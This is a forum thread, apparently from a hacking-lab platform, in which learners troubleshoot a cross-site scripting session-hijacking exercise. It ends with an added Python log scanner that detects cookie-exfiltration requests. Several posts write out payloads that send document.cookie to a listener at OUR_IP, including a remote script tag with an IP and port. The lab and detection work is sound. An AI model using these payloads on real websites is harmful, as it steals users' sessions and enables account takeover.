Cross Site Scripting - Session Hijacking

Hello all, again I am coming to you for help. I am currently trying to get my PHP server to give my script the file it needs to find the cookie I need. I know that might have been a little confusing; DM me if you don’t get my question.

Hi bro.

Can you explain again what the issue is? With more details and what you did to solve it, please, so we know what you are stuck on and why.

I finally got the flag but I am stuck again LOL!!! I am stuck on the skills assessment. Please help!

Ok, I don’t know what I’m doing wrong. I got the PHP server set up. I sent my payload:

">

I put it in the Full Name, User Name, and Image form fields individually and separately and I keep getting blocked. I get activity on the server. I’m just not getting the cookie.

I’ve been hitting my head against this for a couple of days.

I have the PHP server running and I’m getting the first link back to my web server (http://myIP/script.js),
but that script isn’t opening my index.php file.

I’ve tried having document.location='http://OUR_IP/index.php?c='+document.cookie;
and new Image().src='http://OUR_IP/index.php?c='+document.cookie;

and without the script tags with no luck either way.

Is the trick to get this to work some silly quote issue, or how can I see why the 2nd call to index.php is not going out?

Never mind. The magic was posting here.

Didn’t use “script.js” as a filename + making sure OUR_IP was actually changed. Maybe some other stuff, but eventually got the index.php to be called.

I said that I can’t find the right payload.
Already tried all those listed ones…
I sent it with my tun address but they don’t request my PHP or nc server either.

Thanks

1 Like

I’m getting the same as @paulorcsjr . I’ve very carefully done every single step according to the steps laid out in the write up. I think the backend of HTB is broken. Is there a way to work around the broken infrastructure? The scripts written for this exercise on the backend are failing and won’t let anyone properly finish this section.

2 Likes

Hey guys! Need some help too, please!
I was able to find the correct payload and got the following result:

No idea why it didn’t connect to the index.php page afterwards to get the cookie.

PS: not sure why this “(null)” is appearing after '/script.js' in the server log; the code in the file is:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

And I changed it to the VM IP.

Found it.

I finally got it… Finding the payload took so much time from me even though it turned out that it is one of the six payloads mentioned in the module (the third one). Hope this helps, and I think we need to learn more about black boxing pt :smiling_face_with_tear::+1:

1 Like

Give me the payload please, I have been stuck for 3 days.

It seems that my issue was similar to yours. I asked ChatGPT for advice and received multiple answers, but the one that allowed me to successfully obtain the cookie was the last answer: “Additionally, make sure to check the port you set on your listening server. In your description, you mentioned using port 520 (sudo php -S 10.10.14.133:520), but in the XSS payload, you did not specify the port ("><script src="http://10.10.14.133/script.js"></script>). Please ensure that you add the correct port in the XSS payload, as shown below: "><script src="http://10.10.14.133:520/script.js"></script>. Therefore, please make sure that the listening port and the port in the script tag are consistent.”

2 Likes

Did you manage to solve this?

I’m having trouble finding which field is even vulnerable. I did

on each field (replacing the our_ip and field name) and am getting nothing on my listener. Any help appreciated. Thanks

Be careful!!

Don’t use the same port as you used before to test for the payload. I kept the same port for the script.js, but a second call was never performed. After playing around I incremented the port by 1 and afterwards the second call finally reached me. The web server seems a little bit buggy.

1 Like

Did you try starting again from the beginning? I had a problem with this, but after I started a new instance of PwnBox and made a new PHP server using the instructions provided (except I used port 88 instead of 80 because it was taken) it finally worked.

1 Like

Use port 88 instead of 80 in index.php,
and in script.js use port 88 instead of 80 too.

And then in the URL form use
(image)

Lastly, listen on port 88:
sudo php -S OUR_IP:88
Finally, enter the script in the URL form and fill the other inputs normally.

Specify the IP of the virtual machine and also the port (in the script.js), e.g.:
new Image().src='http://OUR_IP:PORT/index.php?c='+document.cookie
With the specified port you will get a response from the PHP file.
I hope you understand; my English is still not very good.

This helped me get the answer. Thank you tomm
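Added example, not taken from this thread or the module: a defender-side check that scans web-server access-log lines for requests whose query string carries a serialised cookie jar, which is exactly what the `index.php?c=...` + `document.cookie` fetch discussed above looks like from the receiving end. The combined-log format, the sample lines and the session cookie names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" style (not from the thread).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /script.js HTTP/1.1" 200 88 "http://app.local/profile" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?c=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 200 0 "http://app.local/profile" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?c=1 HTTP/1.1" 200 12 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=theme%3Ddark HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# document.cookie serialises as "name=value; name=value; ...".
COOKIE_PAIR_RE = re.compile(r'^[\w.-]+=[^;]*(?:;\s*[\w.-]+=[^;]*)*$')
# Assumed session cookie names to look for; extend for the application you defend.
SESSION_NAMES = {"phpsessid", "jsessionid", "sessionid", "session", "sid", "asp.net_sessionid"}


def looks_like_cookie_blob(value):
    """True if a (decoded) query value is shaped like a cookie jar and names a session cookie."""
    if not COOKIE_PAIR_RE.match(value):
        return False
    names = [pair.split("=", 1)[0].strip().lower() for pair in value.split(";")]
    return any(name in SESSION_NAMES for name in names)


def find_cookie_exfil(log_text):
    """Return (source_ip, request_target, query_key) for each request carrying a cookie jar."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so %3D / %3B become "=" / ";" before the shape check.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if looks_like_cookie_blob(value):
                hits.append((m.group("src"), m.group("target"), key))
    return hits


if __name__ == "__main__":
    for src, target, key in find_cookie_exfil(SAMPLE_LOG):
        print(f"possible cookie exfiltration from {src}: {target} (param {key!r})")
```

Only the second sample line is flagged; a session cookie set with the HttpOnly flag would never appear in `document.cookie` in the first place, so such requests are also a sign that the flag is missing.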